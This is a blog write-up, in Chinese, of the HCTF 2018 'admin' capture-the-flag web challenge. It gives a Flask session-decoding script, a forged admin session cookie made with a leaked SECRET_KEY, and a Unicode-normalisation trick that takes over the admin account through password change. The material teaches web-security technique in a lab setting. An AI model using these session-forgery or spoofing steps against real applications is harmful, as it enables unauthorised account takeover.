[HCTF 2018]admin

最新推荐文章于 2024-07-15 21:11:55 发布
最新推荐文章于 2024-07-15 21:11:55 发布
阅读量445 收藏
点赞数
分类专栏: BUUCTF 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yb_140/article/details/126719597
版权

页面右上角有登录和注册按钮

随便注册一个账号,然后登录

发现会回显用户名,并且在页面源代码处发现

需要登录为admin账户才能拿到flag

发现

在change password中,发现页面源代码有

访问https://github.com/woadsl1234/hctf_flask/,可以拿到源码

用的是 flask 框架,flask 是一个轻量型的web框架,其session存储在客户端上并对存储的session进行了签名处理

方法一:flask session 伪造

想要伪造session,需要先了解一下flask中session是怎么构造的。
flask中session是存储在客户端cookie中的,也就是存储在本地。flask仅仅对数据进行了签名。众所周知的是,签名的作用是防篡改,而无法防止被读取。而flask并没有提供加密操作,所以其session的全部内容都是可以在客户端读取的,这就可能造成一些安全问题。
具体可参考:
https://xz.aliyun.com/t/3569
https://www.leavesongs.com/PENETRATION/client-session-security.html#

我们可以通过脚本将session解密一下:

#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode

def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                         'an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                             'decoding the payload')

    return session_json_serializer.loads(payload)

if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))

利用脚本将session解密:python3 python文件名 session值

得到:

{'_fresh': True, '_id': b'88055e107e56327c205cd76ed01567444297e0639a6eacaab70028c48d89bc2ad415cfebac33c8346526ad979c2638d5500592d38d17845ee62df3e2fb7d8989', 'csrf_token': b'76192f438c2f9f3f7bab61ffe6224ad1c3cd011f', 'image': b'F8uk', 'name': 'aaa', 'user_id': '10'}

但是如果我们想要加密伪造生成自己想要的session还需要知道SECRET_KEY,然后我们在config.py里发现了SECRET_KEY

然后在index.html页面发现

只要session[‘name’] == 'admin’即可以得到flag

于是我们找了一个flask session加密的脚本 https://github.com/noraj/flask-session-cookie-manager
利用刚刚得到的SECRET_KEY,在将解密出来的name改为admin

{'_fresh': True, '_id': b'88055e107e56327c205cd76ed01567444297e0639a6eacaab70028c48d89bc2ad415cfebac33c8346526ad979c2638d5500592d38d17845ee62df3e2fb7d8989', 'csrf_token': b'76192f438c2f9f3f7bab61ffe6224ad1c3cd011f', 'image': b'F8uk', 'name': 'admin', 'user_id': '10'}

生成session:python3 flask_session_cookie_manager3.py encode -s SECRET_KEY的值 -t 上面修改为admin后的值

 得到

.eJw9kMGOgkAMhl9l07MHGfRi4oFkdINJh2BGSHsxqAgMjJugBhnju--sm3j-v35_2yfsz315rWFx6-_lBPbNCRZP-DrAAhJZDUpnHeooZL0T6OKQXDyoXLXKcccyeihNoZLpFE3rmcgzXa1sVpNY12SOA8p4Ri6dsazmZHGk3LM6M2yzhnJ0KHCGLhVKx8Jnc-U6g4Zc8p0GSke-vx1Zop9fhYlMA879HnZrUexGtnH4501ku4TXBI7X_ry__bTl5XOCcvRI9MYqryC3sUlOjs3JV8cCc7asaUSzrVmuDQrVolw9uFq-dY0tqvJj2po6KIb_5FJYH0Bxss0FJnC_lv37bxBM4fULyuVstw.Yxa1QA.-H_oT5YKaZvKHMFtKVBsvNEFSOg

修改session,得到flag

方法二:Unicode欺骗

在routes.py发现

这里用的nodeprep.prepare函数,而nodeprep是从Twisted模块导入的,在requirements.txt文件中发现Twisted==10.2.0,而官网最新已经到了19.7.0(2019/9),版本差距很大,应该会存在漏洞。然后我们发现在使用nodeprep.prepare函数转换时过程如下:

ᴬᴰᴹᴵᴺ -> ADMIN -> admin

假如我们注册ᴬᴰᴹᴵᴺ用户,然后在用ᴬᴰᴹᴵᴺ用户登录,因为在login函数里使用了一次nodeprep.prepare函数,因此我们登录上去看到的用户名为ADMIN,此时我们再修改密码,又调用了一次nodeprep.prepare函数将name转换为admin,然后我们就可以改掉admin的密码,最后利用admin账号登录即可拿到flag。

注册:

登录:

修改后,可使用admin进行登录,密码就是修改后的密码

 

参考:HCTF2018-admin_小白白@的博客-CSDN博客

 

超级兵_140
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HCTF2018-admin
迷风小白
09-11 1万+
前言 在BUUCTF上看到这题存在三种解法,感觉比较经典,就想着来复现一下顺便学习一波。存在以下三种解法: flask session 伪造 unicode欺骗 条件竞争 审题 拿到题目发现一共就登录注册两个功能,随便注册一个test/test用户 登录之后查看源码发现提示<!-- you are not admin -->,根据提示和题目名估计要让我们登录admin用户就可以得...
HCTF 2018]admin
夜幕下的灯火阑珊的博客
05-12 952
知识点 unicode欺骗 session伪造 解法一:unicode欺骗 查看源码发现 <!-- you are not admin --> 应该是要注册成admin用户 先注册一个admin1用户,登录后在change password页面查看源码,发现 <!-- https://github.com/woadsl1234/hctf_flask/ --> 访问后可取得源码,部分源码如下 def change(): if not current_user.is_
[HCTF 2018] admin
最新发布
pwfortune的博客
07-15 648
然后去更改密码, 记住改后的密码, 再登出, 使用admin的用户登录, 然后用刚刚改的密码,就可以进去了。尝试注册一个 admin 用户, 可以发现这个用户已经存在, 然后就可以尝试弱口令爆破了。将得到的结果 替换掉原来的session ,刷新一下页面就出现了flag。(现在好像已经登不进去了, 时间太久了估计删了 , 借一下别人的图)对于session解密一下 , 可以看到用户为 1 (我注册的)而且在注册的时候以及在修改密码的时候都会使用一次这个函数。随便注册一个账号进去, 到更改密码的里面去,
HCTF 2018 admin
BlueDoorZz的博客
07-12 501
0x00 题目类型:unicode欺骗,源码泄露,session伪造,条件竞争(Maybe)。 0x01 题目索引界面有登录与注册两个功能,查看源码注释中有you are not admin字样,可能要求以admin身份登陆。先注册一个账号,看看有没有有用的信息。 在改密码的界面发现源码泄漏,去github看源码。源码较长,截取关键部分。 @app.route('/register', methods = ['GET', 'POST']) def register(): if cu
HCTF2018逆向LuckyStar分析
11-12
HCTF2018逆向LuckyStar分析HCTF2018逆向LuckyStar分析
2018手工更新FlatLab Admin Template
09-15
"2018手工更新FlatLab Admin Template"是一款专为后台管理系统设计的模板,它集成了现代化的设计风格和丰富的功能组件。FlatLab以其扁平化的设计理念,提供了高效且直观的用户界面,使得管理员能够轻松地进行数据...
fastadmin事务管理系统
05-27
FastAdmin事务管理系统 FastAdmin事务管理系统是一种基于Web的事务管理系统,旨在帮助管理员更好地管理事务流程和数据。下面是该系统的一些重要知识点: 登录 Token 设计 FastAdmin的事务管理系统使用 Token-...
canal-admin
02-28
《Canal Admin详解:数据库同步神器的管理平台》 Canal是阿里巴巴开源的一款高效、稳定的数据库实时增量数据订阅与消费组件,广泛应用于大数据同步、实时分析等场景。而Canal Admin则是Canal的管理工具,它为Canal...
Ace Admin 2018.4最新版
04-17
"Ace Admin 2018.4最新版" 提供了最新的更新和改进,确保了开发者可以利用最新的技术进行开发。 Ace Admin 的核心特性包括: 1. **响应式布局**:它支持各种设备,从小屏幕手机到大屏幕桌面,都能提供良好的用户...
HCTF2018-admin-复现
qq_43189757的博客
04-10 754
session 详细了解 学习的博客:https://blog.csdn.net/h19910518/article/details/79348051 写的真是好 session_start() 这是个无任何返回值的函数,既不会报错,也不会成功。它的作用是开启session,并随机生成一个唯一的32位的session_id,类似于这样: 4c83638b3b0dbf65583181c2f89168...
hctf2018-admin
Sea_Sand息禅
09-26 961
1、问题分析 熟悉一下网站,有这些功能:注册、登录、上传文章、修改密码、登出 对源码进行观察,发现 源码中存在 <!-- you are not admin --> 可能我们要以管理员身份登录吧。 继续找线索,最后发现在修改密码的源码中有: https://github.com/woadsl1234/hctf_flask/ 这个是网站用的flask源码,然后clone下来就可以进行代...
FastAdmin使用手册:安装与功能详解
"fastadmin.pdf 是一份中文说明文档,详细介绍了 FastAdmin 框架的使用方法、安装过程以及各种功能。FastAdmin 是基于 ThinkPHP6 的后台管理系统,提供了丰富的功能模块,包括一键生成 CRUD、菜单、API 文档、插件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值